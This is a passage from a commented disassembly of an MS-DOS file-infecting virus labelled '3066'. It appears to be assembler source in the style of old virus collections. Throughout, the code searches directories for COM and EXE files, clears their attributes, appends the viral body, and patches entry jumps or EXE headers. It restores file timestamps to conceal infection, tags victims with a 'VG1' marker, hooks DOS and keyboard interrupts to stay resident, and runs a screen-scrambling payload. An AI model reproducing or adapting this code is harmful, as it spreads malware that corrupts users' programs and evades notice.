ds:data_24e[si],0 ; (0000:0155=0EAh) - jne loc_25 ; Jump if not equal - mov ah,4Fh ; 'O' - jmp short loc_22 ; (03BA) -loc_25: ; xref 6FB8:03A3, 03C0, 03E5 - call sub_2 ; (0444) - mov dx,si - add dx,data_13e ; (0000:00B3=1) - mov ah,1Ah - int 21h ; DOS Services ah=function 1Ah - ; set DTA to ds:dx -loc_26: ; xref 6FB8:0424 - mov ah,4Fh ; 'O' - mov cx,10h - cmp byte ptr ds:data_16e[si],0 ; (0000:00DF=1) - jne loc_27 ; Jump if not equal - mov byte ptr ds:data_16e[si],1 ; (0000:00DF=1) - mov word ptr [si+5],2E2Ah - mov word ptr [si+7],2Ah - mov ah,4Eh ; 'N' - mov dx,si - add dx,5 -loc_27: ; xref 6FB8:0402 - call sub_1 ; (0436) - jc loc_29 ; Jump if carry Set - test byte ptr ds:data_14e[si],10h ; (0000:00C8=0DAh) - jz loc_26 ; Jump if zero - mov dx,si - add dx,data_15e ; (0000:00D1=10h) - mov ah,3Bh ; ';' - call sub_1 ; (0436) - jc loc_29 ; Jump if carry Set - jmp loc_17 ; (0359) - -3066 endp - -; -; SUBROUTINE -; -; Called from: 6FB8:02E7, 02F7, 037C, 03BD, 041A, 042E, 0450 -; 0571, 0582, 058A -; - -sub_1 proc near - int 21h ; DOS Services ah=function 43h - ; get/set file attrb, nam@ds:dx - jc loc_ret_28 ; Jump if carry Set - test byte ptr cs:data_47e[si],0FFh ; (6FB8:00EE=0) - jz loc_ret_28 ; Jump if zero - stc ; Set carry flag - -loc_ret_28: ; xref 6FB8:0438, 0440 - retn -sub_1 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:0351, 03EB, 0454 -; - -sub_2 proc near - mov word ptr [si+5],5Ch - mov dx,si - add dx,5 - mov ah,3Bh ; ';' - call sub_1 ; (0436) - retn -sub_2 endp - -loc_29: ; xref 6FB8:0394, 03D5, 041D, 0431 - call sub_2 ; (0444) - mov dx,si - add dx,46h - mov ah,3Bh ; ';' - int 21h ; DOS Services ah=function 3Bh - ; set current dir, path @ ds:dx -loc_30: ; xref 6FB8:02C8, 033C - mov bx,ds:data_48e[si] ; (6FB8:00EF=0) - or bx,bx ; Zero ? 
- jz loc_32 ; Jump if zero - mov cx,ds:data_51e[si] ; (6FB8:00F5=0) - mov dx,data_56[si] ; (6FB8:0151=4D10h) - mov ds,data_57[si] ; (6FB8:0153=6FB8h) - cmp cx,20h - je loc_31 ; Jump if equal - mov ax,4301h - int 21h ; DOS Services ah=function 43h - ; get/set file attrb, nam@ds:dx -loc_31: ; xref 6FB8:0477 - push cs - pop ds - mov cx,ds:data_49e[si] ; (6FB8:00F1=0) - mov dx,ds:data_50e[si] ; (6FB8:00F3=0) - mov ax,5701h - int 21h ; DOS Services ah=function 57h - ; get/set file date & time - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle -loc_32: ; xref 6FB8:0466 - mov dl,ds:data_41e[si] ; (6FB8:00E3=0) - mov ah,0Eh - int 21h ; DOS Services ah=function 0Eh - ; set default drive dl (0=a:) - call sub_16 ; (089A) - pop ax - mov ds:data_39e[si],ax ; (6FB8:00E0=0) - cmp byte ptr [si+3],0FFh - je loc_33 ; Jump if equal - add ax,10h - add [si+2],ax - pop ax - pop ds -;* jmp dword ptr cs:[si] ;*1 entry - db 0FFh, 2Ch -loc_33: ; xref 6FB8:04A5 - call sub_10 ; (076E) - push cs - pop ds - mov ax,[si] - mov word ptr ds:[100h],ax ; (6FB8:0100=40E9h) - mov al,[si+2] - mov byte ptr ds:[102h],al ; (6FB8:0102=1) - jz loc_34 ; Jump if zero - mov bx,ds - add bx,1D0h - mov es,bx - mov di,si - mov dx,si - mov cx,0BFAh - call sub_20 ; (0D32) - mov cx,dx - mov si,dx - dec si - mov di,si - std ; Set direction flag - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - push ds - pop es - mov di,data_93e ; (7188:0100=0) - mov ds,bx - mov si,dx - mov cx,0BFAh - call sub_20 ; (0D32) - mov si,100h - push cs - pop ds - call sub_13 ; (07CD) - mov dx,1D0h -loc_34: ; xref 6FB8:04C2 - mov di,cs - add di,dx - mov word ptr [si+5],100h - mov [si+7],di - pop ax - pop ds - mov ds,di - mov es,di - mov ss,di - xor bx,bx ; Zero register - xor cx,cx ; Zero register - xor bp,bp ; Zero register -;* jmp dword ptr cs:[si+5] ;*1 entry - db 0FFh, 6Ch, 05h -loc_35: ; xref 6FB8:0574, 0585, 058D - mov byte ptr cs:data_47e[si],0 ; (6FB8:00EE=0) - retn - -; -; SUBROUTINE -; -; 
Called from: 6FB8:0339, 0391, 03D2 -; - -sub_3 proc near - mov bx,ds:data_48e[si] ; (6FB8:00EF=0) - or bx,bx ; Zero ? - jz loc_ret_36 ; Jump if zero - mov dx,si - add dx,data_34e ; (6FB8:0004=0) - nop ;*ASM fixup - sign extn byte - mov cx,1 - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - -loc_ret_36: ; xref 6FB8:0525 - retn -sub_3 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:038C, 03CD -; - -sub_4 proc near - push dx - mov ah,19h - int 21h ; DOS Services ah=function 19h - ; get default drive al (0=a:) - add al,41h ; 'A' - mov ah,3Ah ; ':' - mov word ptr ds:[884h][si],ax ; (6FB8:0884=8489h) - mov byte ptr ds:[886h][si],5Ch ; (6FB8:0886=0EAh) '\' - push si - add si,offset ds:[887h] ; (6FB8:0887=0) - mov ah,47h ; 'G' - mov di,si - xor dl,dl ; Zero register - int 21h ; DOS Services ah=function 47h - ; get present dir,drive dl,1=a: - pop si - dec di -loc_37: ; xref 6FB8:055B - inc di - mov al,[di] - or al,al ; Zero ? - jnz loc_37 ; Jump if not zero - pop bx - mov byte ptr [di],5Ch ; '\' - inc di - mov dx,bx -loc_38: ; xref 6FB8:056C - mov al,[bx] - mov [di],al - inc bx - inc di - or al,al ; Zero ? 
- jnz loc_38 ; Jump if not zero - -; External Entry into Subroutine -; -; Called from: 6FB8:097E - -sub_5: - mov ax,4300h - call sub_1 ; (0436) - jc loc_35 ; Jump if carry Set - mov cs:data_42e[si],cx ; (6FB8:00E4=0) - and cx,0FEh - mov ax,4301h - call sub_1 ; (0436) - jc loc_35 ; Jump if carry Set - mov ax,3D02h - call sub_1 ; (0436) - jc loc_35 ; Jump if carry Set - mov bx,ax - push ds - push dx - call sub_6 ; (05BD) - pop dx - pop ds - pushf ; Push flags - mov cx,cs:data_42e[si] ; (6FB8:00E4=0) - cmp cx,20h - je loc_39 ; Jump if equal - mov ax,4301h - int 21h ; DOS Services ah=function 43h - ; get/set file attrb, nam@ds:dx -loc_39: ; xref 6FB8:05A1 - mov cx,cs:data_43e[si] ; (6FB8:00E6=0) - mov dx,cs:data_44e[si] ; (6FB8:00E8=0) - mov ax,5701h - int 21h ; DOS Services ah=function 57h - ; get/set file date & time - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - popf ; Pop flags - retn -sub_4 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:0593 -; - -sub_6 proc near - mov ax,5700h - int 21h ; DOS Services ah=function 57h - ; get/set file date & time - push cs - pop ds - mov ds:data_43e[si],cx ; (6FB8:00E6=0) - mov ds:data_44e[si],dx ; (6FB8:00E8=0) - mov dx,si - add dx,0Dh - mov di,dx - mov ah,3Fh ; '?' - mov cx,1Ch - int 21h ; DOS Services ah=function 3Fh - ; read file, cx=bytes, to ds:dx - cmp word ptr [di],5A4Dh - je loc_42 ; Jump if equal - call sub_9 ; (0764) - add ax,0CF5h - jc loc_ret_40 ; Jump if carry Set - cmp byte ptr [di],0E9h - jne loc_41 ; Jump if not equal - mov dx,[di+1] - xor cx,cx ; Zero register - mov ax,4200h - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov dx,di - add dx,1Ch - mov ah,3Fh ; '?' 
- mov cx,3 - int 21h ; DOS Services ah=function 3Fh - ; read file, cx=bytes, to ds:dx - call sub_7 ; (06AB) - jnc loc_41 ; Jump if carry=0 - mov cs:data_58[si],1 ; (6FB8:0155=0) - -loc_ret_40: ; xref 6FB8:05E6 - retn -loc_41: ; xref 6FB8:05EB, 0606 - call sub_9 ; (0764) - mov word ptr ds:[880h][si],ax ; (6FB8:0880=687h) - mov word ptr ds:[882h][si],dx ; (6FB8:0882=90h) - push ax - mov word ptr [di+3],0FFFFh - mov cx,5 - mov ah,40h ; '@' - mov dx,di - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - mov dx,si - add dx,5 - mov cx,0BF5h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - mov ax,4200h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov byte ptr [di],0E9h - pop ax - add ax,0F7h - mov [di+1],ax - mov dx,di - mov cx,3 - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - clc ; Clear carry flag - retn -loc_42: ; xref 6FB8:05DE - cmp word ptr [di+0Ch],0FFFFh - jne loc_43 ; Jump if not equal - push si - mov si,[di+14h] - mov cx,[di+16h] - mov ax,cx - mov cl,ch - xor ch,ch ; Zero register - shr cx,1 ; Shift w/zeros fill - shr cx,1 ; Shift w/zeros fill - shr cx,1 ; Shift w/zeros fill - shr cx,1 ; Shift w/zeros fill - shl ax,1 ; Shift w/zeros fill - shl ax,1 ; Shift w/zeros fill - shl ax,1 ; Shift w/zeros fill - shl ax,1 ; Shift w/zeros fill - add si,ax - adc cx,0 - sub si,3 - sbb cx,0 - mov ax,[di+8] - call sub_8 ; (0751) - add si,ax - adc cx,dx - mov dx,si - pop si - mov ax,4200h - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov dx,di - add dx,1Ch - mov ah,3Fh ; '?' 
- mov cx,3 - int 21h ; DOS Services ah=function 3Fh - ; read file, cx=bytes, to ds:dx - call sub_7 ; (06AB) - jnc loc_46 ; Jump if carry=0 - mov cs:data_58[si],1 ; (6FB8:0155=0) - retn - -; External Entry into Subroutine -; -; Called from: 6FB8:0603, 069F - -sub_7: - cmp word ptr [di+1Ch],4756h - jne loc_45 ; Jump if not equal - cmp byte ptr [di+1Eh],31h ; '1' - jne loc_45 ; Jump if not equal -loc_43: ; xref 6FB8:0657 - stc ; Set carry flag - -loc_ret_44: ; xref 6FB8:06E0 - retn -loc_45: ; xref 6FB8:06B0, 06B6 - clc ; Clear carry flag - retn -loc_46: ; xref 6FB8:06A2 - call sub_9 ; (0764) - mov word ptr ds:[880h][si],ax ; (6FB8:0880=687h) - mov word ptr ds:[882h][si],dx ; (6FB8:0882=90h) - mov cx,[di+4] - shl cx,1 ; Shift w/zeros fill - xchg ch,cl - mov bp,cx - and bp,0FF00h - xor ch,ch ; Zero register - add bp,[di+6] - adc cx,0 - sub bp,ax - sbb cx,dx - jc loc_ret_44 ; Jump if carry Set - push ax - push dx - push word ptr [di+18h] - mov byte ptr [di+18h],0FFh - mov cx,5 - mov ah,40h ; '@' - mov dx,di - add dx,14h - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - pop word ptr [di+18h] - mov dx,si - add dx,5 - mov cx,0BF5h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - mov ax,4200h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - pop word ptr [di+16h] - pop word ptr [di+14h] - add word ptr [di+14h],0FAh - adc word ptr [di+16h],0 - mov ax,[di+8] - call sub_8 ; (0751) - sub [di+14h],ax - sbb [di+16h],dx - mov cl,0Ch - shl word ptr [di+16h],cl ; Shift w/zeros fill - mov ax,0BFAh - add ax,[di+2] - mov [di+2],ax - and word ptr [di+2],1FFh - mov al,ah - xor ah,ah ; Zero register - shr ax,1 ; Shift w/zeros fill - add [di+4],ax - mov dx,di - mov cx,1Ch - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - clc ; Clear carry flag - retn -sub_6 endp - - -; -; SUBROUTINE -; -; 
Called from: 6FB8:0684, 0721 -; - -sub_8 proc near - xor dx,dx ; Zero register - shl ax,1 ; Shift w/zeros fill - rcl dx,1 ; Rotate thru carry - shl ax,1 ; Shift w/zeros fill - rcl dx,1 ; Rotate thru carry - shl ax,1 ; Shift w/zeros fill - rcl dx,1 ; Rotate thru carry - shl ax,1 ; Shift w/zeros fill - rcl dx,1 ; Rotate thru carry - retn -sub_8 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:05E0, 060F, 06BC -; - -sub_9 proc near - xor dx,dx ; Zero register - xor cx,cx ; Zero register - mov ax,4202h - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - retn -sub_9 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:0263, 04B2 -; - -sub_10 proc near - xor ax,ax ; Zero register - mov ds,ax - lds di,dword ptr ds:data_11e ; (0000:009C=10BCh) Load 32 bit ptr - lds di,dword ptr [di+1] ; Load 32 bit ptr - mov ax,di - sub di,75Fh - call sub_11 ; (07AB) - jz loc_ret_47 ; Jump if zero - mov di,ax - sub di,755h - call sub_11 ; (07AB) - jz loc_ret_47 ; Jump if zero - lds di,dword ptr ds:data_27e ; (00AE:0080=4EFFh) Load 32 bit ptr - lds di,dword ptr [di+1] ; Load 32 bit ptr - mov ax,di - sub di,676h - call sub_11 ; (07AB) - jz loc_ret_47 ; Jump if zero - mov di,ax - sub di,673h - call sub_11 ; (07AB) - -loc_ret_47: ; xref 6FB8:0782, 078D, 079F - retn -sub_10 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:077F, 078A, 079C, 07A7 -; - -sub_11 proc near - xor dx,dx ; Zero register - cmp word ptr [di],4756h - jne loc_48 ; Jump if not equal - cmp byte ptr [di+2],31h ; '1' - je loc_49 ; Jump if equal -loc_48: ; xref 6FB8:07B1 - inc dx -loc_49: ; xref 6FB8:07B7 - sub di,0F7h - or dx,dx ; Zero ? 
- retn -sub_11 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:07DE, 07E4, 07EA, 07F0, 0864, 086A, 0870 -; - -sub_12 proc near - mov al,0EAh - stosb ; Store al to es:[di] - mov ax,cx - add ax,si - stosw ; Store ax to es:[di] - mov ax,cs - stosw ; Store ax to es:[di] - -loc_ret_50: ; xref 6FB8:07CF - retn -sub_12 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:04F4 -; - -sub_13 proc near - or dx,dx ; Zero ? - jz loc_ret_50 ; Jump if zero - push ds - push es - mov es,ds:data_39e[si] ; (6FB8:00E0=0) - mov di,data_46e ; (6FB8:00EC=0) - cld ; Clear direction - mov cx,9A8h - call sub_12 ; (07C1) - mov cx,76Ah - call sub_12 ; (07C1) - mov cx,7BEh - call sub_12 ; (07C1) - mov cx,84Ch - call sub_12 ; (07C1) - xor ax,ax ; Zero register - mov ds,ax - cli ; Disable interrupts - mov ax,0ECh - xchg ax,ds:data_3e ; (0000:0070=0FF53h) - mov word ptr cs:[0A88h][si],ax ; (6FB8:0A88=49A0h) - mov ax,es - xchg ax,ds:data_4e ; (0000:0072=0F000h) - mov word ptr cs:[0A8Ah][si],ax ; (6FB8:0A8A=0B904h) - mov ax,0F1h - xchg ax,ds:data_5e ; (0000:0080=1094h) - mov word ptr cs:[76Eh][si],ax ; (6FB8:076E=0C033h) - mov ax,es - xchg ax,ds:data_6e ; (0000:0082=123h) - mov word ptr cs:[770h][si],ax ; (6FB8:0770=0D88Eh) - mov ax,0F6h - xchg ax,ds:data_7e ; (0000:0084=109Eh) - mov word ptr cs:[7DCh][si],ax ; (6FB8:07DC=9A8h) - mov ax,es - xchg ax,ds:data_8e ; (0000:0086=123h) - mov word ptr cs:[7DEh][si],ax ; (6FB8:07DE=0E0E8h) - mov ax,0FBh - xchg ax,ds:data_11e ; (0000:009C=10BCh) - mov word ptr cs:[857h][si],ax ; (6FB8:0857=6C3h) - mov ax,es - xchg ax,word ptr ds:data_11e+2 ; (0000:009E=123h) - mov word ptr cs:[859h][si],ax ; (6FB8:0859=848Eh) - pop es - pop ds - sti ; Enable interrupts - retn -sub_13 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:08F2 -; - -sub_14 proc near - push es - mov es,word ptr ds:[0E0h][si] ; (0000:00E0=10DAh) - mov di,data_21e ; (0000:00F1=10h) - cld ; Clear direction - mov cx,76Dh - call sub_12 ; (07C1) - mov cx,7E0h - call sub_12 ; (07C1) - mov cx,856h - call 
sub_12 ; (07C1) - pop es - retn -sub_14 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:024A, 0938 -; - -sub_15 proc near - push es - xor ax,ax ; Zero register - mov es,ax - mov ax,85Bh - add ax,si - xchg ax,es:data_9e ; (0000:0090=156h) - mov ds:data_18e[si],ax ; (0000:00EA=123h) - mov ax,cs - xchg ax,es:data_10e ; (0000:0092=44Bh) - mov ds:data_19e[si],ax ; (0000:00EC=10DAh) - pop es - mov byte ptr ds:data_20e[si],0 ; (0000:00EE=23h) - retn -sub_15 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:0499, 0981 -; - -sub_16 proc near - push es - xor ax,ax ; Zero register - mov es,ax - mov ax,cs:data_45e[si] ; (6FB8:00EA=0) - mov es:data_9e,ax ; (0000:0090=156h) - mov ax,cs:data_46e[si] ; (6FB8:00EC=0) - mov es:data_10e,ax ; (0000:0092=44Bh) - pop es - retn -sub_16 endp - - jmp short loc_53 ; (08EA) - nop -;* jmp far ptr loc_2 ;*(029B:136C) - db 0EAh, 6Ch, 13h, 9Bh, 02h - -; -; SUBROUTINE -; -; Called from: 6FB8:0247, 08CB, 08EC, 0935 -; - -sub_17 proc near - pop bx - push ds - push ax - push ds - push cs - pop ds - call sub_18 ; (08C4) - -; External Entry into Subroutine -; -; Called from: 6FB8:08C1 - -sub_18: - pop si - sub si,77Bh - jmp bx ;*Register jump -loc_51: ; xref 6FB8:0918, 091D - call sub_17 ; (08BB) - push cx - mov ax,[si+7] - mov cx,es - cmp ax,cx - pop cx - pop ds - pop ax - jnz loc_52 ; Jump if not zero - push cs - pop es - cmp ah,49h ; 'I' - je loc_52 ; Jump if equal - add bx,1D0h -loc_52: ; xref 6FB8:08D9, 08E0 - pop ds - jmp short loc_55 ; (0924) - db 90h -loc_53: ; xref 6FB8:08B3, 090A, 0913 - xor dx,dx ; Zero register -loc_54: ; xref 6FB8:090F - call sub_17 ; (08BB) - push es - push dx - cli ; Disable interrupts - call sub_14 ; (0858) - sti ; Enable interrupts - pop ax - mov dx,1D0h - add dx,ax - add dx,10h - pop es - pop ds - pop ax - pop ds - mov ah,31h ; '1' - jmp short loc_55 ; (0924) - cmp ah,4Ch ; 'L' - je loc_53 ; Jump if equal - cmp ah,31h ; '1' - je loc_54 ; Jump if equal - or ah,ah ; Zero ? 
- jz loc_53 ; Jump if zero - cmp ah,49h ; 'I' - je loc_51 ; Jump if equal - cmp ah,4Ah ; 'J' - je loc_51 ; Jump if equal - cmp ah,4Bh ; 'K' - je loc_56 ; Jump if equal -loc_55: ; xref 6FB8:08E7, 0905, 0993 -;* jmp far ptr loc_4 ;*(0E4C:035D) - db 0EAh, 5Dh, 03h, 4Ch, 0Eh - db 80h,0FCh, 4Bh, 75h,0F6h -loc_56: ; xref 6FB8:0922 - push cx - push dx - push es - push bx - push si - push di - push bp - call sub_17 ; (08BB) - call sub_15 ; (0875) -loc_57: ; xref 6FB8:0941, 0949 - sti ; Enable interrupts - test byte ptr ds:data_26e,2 ; (0000:0972=74h) - jnz loc_57 ; Jump if not zero - cli ; Disable interrupts - test byte ptr ds:data_26e,2 ; (0000:0972=74h) - jnz loc_57 ; Jump if not zero - or byte ptr ds:data_26e,2 ; (0000:0972=74h) - pop ds - mov bx,dx - mov byte ptr cs:data_40e[si],0FFh ; (6FB8:00E2=0) - cmp byte ptr [bx+1],3Ah ; ':' - jne loc_58 ; Jump if not equal - mov al,[bx] - or al,20h ; ' ' - sub al,61h ; 'a' - mov cs:data_40e[si],al ; (6FB8:00E2=0) -loc_58: ; xref 6FB8:095D - push si - push di - push es - cld ; Clear direction - mov si,dx - push cs - pop es - mov di,offset ds:[984h] ; (6FB8:0984=2Eh) -loc_59: ; xref 6FB8:0979 - lodsb ; String [si] to al - stosb ; Store al to es:[di] - or al,al ; Zero ? 
- jnz loc_59 ; Jump if not zero - pop es - pop di - pop si - call sub_5 ; (056E) - call sub_16 ; (089A) - and byte ptr cs:[972h],0FDh ; (6FB8:0972=0BFh) - pop ax - pop ds - pop bp - pop di - pop si - pop bx - pop es - pop dx - pop cx - jmp short loc_55 ; (0924) -sub_17 endp - - db 83h,0C2h, 0Fh,0B1h, 04h,0D3h - db 0EAh,0E9h, 4Dh,0FFh,0EAh,0FEh - db 5Dh, 9Bh, 02h, 56h,0E8h, 00h - db 00h, 5Eh, 81h,0EEh, 5Fh, 08h - db 2Eh, 80h, 8Ch,0EEh, 00h, 01h - db 5Eh, 32h,0C0h,0CFh, 01h, 00h - db 00h, 00h, 8Ah, 00h, 00h, 00h - db 00h, 5Fh,0FEh, 00h, 00h, 00h - db 00h,0B8h, 00h, 00h, 49h, 00h - db 00h, 00h - db 'A:\TEST3066.COM' - - - db 00h, 00h, 00h, 45h, 58h, 45h - db 00h, 45h, 00h - db 143 dup (0) -loc_60: ; xref 6FB8:0AEF - push cx - push ds - push es - push si - push di - push cs - pop es - cld ; Clear direction - test al,20h ; ' ' - jz loc_63 ; Jump if zero - test al,2 - jnz loc_64 ; Jump if not zero - xor ax,ax ; Zero register - mov ds,ax - mov al,ds:data_25e ; (0000:0449=3) - mov cx,0B800h - cmp al,7 - jne loc_61 ; Jump if not equal - mov cx,0B000h - jmp short loc_62 ; (0A9F) -loc_61: ; xref 6FB8:0A90 - cmp al,2 - je loc_62 ; Jump if equal - cmp al,3 - jne loc_64 ; Jump if not equal -loc_62: ; xref 6FB8:0A95, 0A99 - mov word ptr cs:[97Ch],cx ; (6FB8:097C=5E5Fh) - or byte ptr cs:[972h],2 ; (6FB8:0972=0BFh) - mov word ptr cs:[97Eh],0 ; (6FB8:097E=0EDE8h) - mov ds,cx - mov cx,7D0h - xor si,si ; Zero register - mov di,offset ds:[0CF5h] ; (6FB8:0CF5=0BEh) - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - xor ax,ax ; Zero register - mov ds,ax - mov ax,0B92h - xchg ax,ds:data_1e ; (0000:0024=45h) - mov word ptr cs:[973h],ax ; (6FB8:0973=984h) - mov ax,cs - xchg ax,ds:data_2e ; (0000:0026=3D1h) - mov word ptr cs:[975h],ax ; (6FB8:0975=0AAACh) -loc_63: ; xref 6FB8:0A7E - mov cx,50h - mov ax,0F00h - mov di,offset data_54 ; (6FB8:0105=9) - rep stosw ; Rep when cx >0 Store ax to es:[di] - and byte ptr cs:[972h],7 ; (6FB8:0972=0BFh) -loc_64: ; xref 6FB8:0A82, 0A9D - pop di - pop si - 
pop es - pop ds - pop cx - jmp loc_76 ; (0BCF) -loc_65: ; xref 6FB8:0AFE - jmp short loc_60 ; (0A74) - push ax - mov byte ptr cs:[979h],0 ; (6FB8:0979=75h) - mov al,byte ptr cs:[972h] ; (6FB8:0972=0BFh) - test al,60h ; '`' - jnz loc_65 ; Jump if not zero - test al,80h - jz loc_68 ; Jump if zero - cmp word ptr cs:[97Eh],0 ; (6FB8:097E=0EDE8h) - je loc_66 ; Jump if equal - inc word ptr cs:[97Eh] ; (6FB8:097E=0EDE8h) - cmp word ptr cs:[97Eh],444h ; (6FB8:097E=0EDE8h) - jl loc_66 ; Jump if < - call sub_19 ; (0C25) - jmp loc_76 ; (0BCF) -loc_66: ; xref 6FB8:0B0A, 0B18 - test al,18h - jz loc_67 ; Jump if zero - dec word ptr cs:[977h] ; (6FB8:0977=0C00Ah) - jnz loc_67 ; Jump if not zero - and byte ptr cs:[972h],0E7h ; (6FB8:0972=0BFh) - or byte ptr cs:[972h],40h ; (6FB8:0972=0BFh) '@' - test al,8 - jz loc_67 ; Jump if zero - or byte ptr cs:[972h],20h ; (6FB8:0972=0BFh) ' ' -loc_67: ; xref 6FB8:0B22, 0B29, 0B39, 0B4C - jmp loc_76 ; (0BCF) -loc_68: ; xref 6FB8:0B02 - xor byte ptr cs:[972h],1 ; (6FB8:0972=0BFh) - test al,1 - jz loc_67 ; Jump if zero - push bx - push si - push ds - mov ds,word ptr cs:[97Ch] ; (6FB8:097C=5E5Fh) - xor si,si ; Zero register - mov byte ptr cs:[96Eh],0 ; (6FB8:096E=8Bh) -loc_69: ; xref 6FB8:0BB5 - mov bx,cs:data_54[si] ; (6FB8:0105=0CD09h) - or bx,bx ; Zero ? 
- jz loc_70 ; Jump if zero - cmp byte ptr [bx+si],20h ; ' ' - jne loc_70 ; Jump if not equal - cmp byte ptr ds:data_31e[bx+si],20h ; (5E5F:FF60=0FFh) ' ' - je loc_70 ; Jump if equal - mov ax,720h - xchg ax,ds:data_31e[bx+si] ; (5E5F:FF60=0FFFFh) - mov [bx+si],ax - add bx,0A0h -loc_70: ; xref 6FB8:0B65, 0B6A, 0B71 - cmp bx,data_30e ; (5E5F:0FA0=0FFh) - je loc_71 ; Jump if equal - cmp byte ptr [bx+si],20h ; ' ' - jne loc_71 ; Jump if not equal - jnz loc_74 ; Jump if not zero -loc_71: ; xref 6FB8:0B84, 0B89 - mov bx,data_29e ; (5E5F:0F00=0FFh) -loc_72: ; xref 6FB8:0BA2 - cmp byte ptr [bx+si],20h ; ' ' - jne loc_73 ; Jump if not equal - cmp byte ptr ds:data_31e[bx+si],20h ; (5E5F:FF60=0FFh) ' ' - jne loc_74 ; Jump if not equal -loc_73: ; xref 6FB8:0B93 - sub bx,0A0h - or bx,bx ; Zero ? - jnz loc_72 ; Jump if not zero -loc_74: ; xref 6FB8:0B8B, 0B9A - mov cs:data_54[si],bx ; (6FB8:0105=0CD09h) - or word ptr cs:[96Eh],bx ; (6FB8:096E=0F28Bh) - add si,2 - cmp si,0A0h - jne loc_69 ; Jump if not equal - cmp byte ptr cs:[96Eh],0 ; (6FB8:096E=8Bh) - jne loc_75 ; Jump if not equal - or byte ptr cs:[972h],80h ; (6FB8:0972=0BFh) - mov word ptr cs:[97Eh],1 ; (6FB8:097E=0EDE8h) -loc_75: ; xref 6FB8:0BBD - pop ds - pop si - pop bx -loc_76: ; xref 6FB8:0AEC, 0B1D, 0B41 - pop ax -;* jmp far ptr loc_90 ;*(FC00:3F4D) - db 0EAh, 4Dh, 3Fh, 00h,0FCh -loc_77: ; xref 6FB8:0C32 - mov al,20h ; ' ' - out 20h,al ; port 20h, 8259-1 int command - ; al = 20h, end of interrupt - pop ax - iret ; Interrupt return - db 50h,0E4h, 60h, 2Eh,0A2h, 7Ah - db 09h,0E4h, 61h, 8Ah,0E0h, 0Ch - db 80h,0E6h, 61h, 8Ah,0C4h,0E6h - db 61h, 2Eh, 80h, 3Eh, 79h, 09h - db 00h, 2Eh,0C6h, 06h, 79h, 09h - db 01h, 75h,0D9h, 2Eh,0A0h, 7Ah - db 09h, 3Ch,0F0h, 74h,0D1h, 24h - db 7Fh, 2Eh, 3Ah, 06h, 7Bh, 09h - db 2Eh,0A2h, 7Bh, 09h, 74h,0C4h - db 2Eh, 83h, 3Eh, 7Eh, 09h, 00h - db 74h, 07h, 2Eh,0C7h, 06h, 7Eh - db 09h, 01h, 00h,0E8h, 02h, 00h - db 0EBh,0B0h - -; -; SUBROUTINE -; -; Called from: 6FB8:0B1A -; - -sub_19 proc near - 
mov word ptr cs:[977h],28h ; (6FB8:0977=0C00Ah) - test byte ptr cs:[972h],80h ; (6FB8:0972=0BFh) - jz loc_77 ; Jump if zero - mov byte ptr cs:[970h],1 ; (6FB8:0970=0Eh) - push bx - push si - push ds - mov ds,word ptr cs:[97Ch] ; (6FB8:097C=5E5Fh) - test byte ptr cs:[972h],10h ; (6FB8:0972=0BFh) - jnz loc_81 ; Jump if not zero - or byte ptr cs:[972h],10h ; (6FB8:0972=0BFh) - xor si,si ; Zero register -loc_78: ; xref 6FB8:0C77 - mov bx,data_29e ; (5E5F:0F00=0FFh) -loc_79: ; xref 6FB8:0C5E - cmp byte ptr [bx+si],20h ; ' ' - je loc_80 ; Jump if equal - sub bx,0A0h - jnc loc_79 ; Jump if carry=0 - mov bx,0F00h -loc_80: ; xref 6FB8:0C58 - add bx,data_28e ; (5E5F:00A0=0FFh) - mov cs:data_54[si],bx ; (6FB8:0105=0CD09h) - mov word ptr cs:[980h][si],bx ; (6FB8:0980=0E8FBh) - inc si - inc si - cmp si,data_37e ; (6FB8:00A0=0) - jne loc_78 ; Jump if not equal -loc_81: ; xref 6FB8:0C48 - xor si,si ; Zero register -loc_82: ; xref 6FB8:0CE4 - cmp cs:data_54[si],0FA0h ; (6FB8:0105=0CD09h) - je loc_88 ; Jump if equal - mov bx,word ptr cs:[980h][si] ; (6FB8:0980=0E8FBh) - mov ax,[bx+si] - cmp ax,word ptr cs:[0CF5h][bx+si] ; (6FB8:0CF5=0F5BEh) - jne loc_84 ; Jump if not equal - push bx -loc_83: ; xref 6FB8:0CA0, 0CA4 - or bx,bx ; Zero ? - jz loc_86 ; Jump if zero - sub bx,0A0h - cmp ax,word ptr cs:[0CF5h][bx+si] ; (6FB8:0CF5=0F5BEh) - jne loc_83 ; Jump if not equal - cmp ax,[bx+si] - je loc_83 ; Jump if equal - pop bx -loc_84: ; xref 6FB8:0C90 - or bx,bx ; Zero ? 
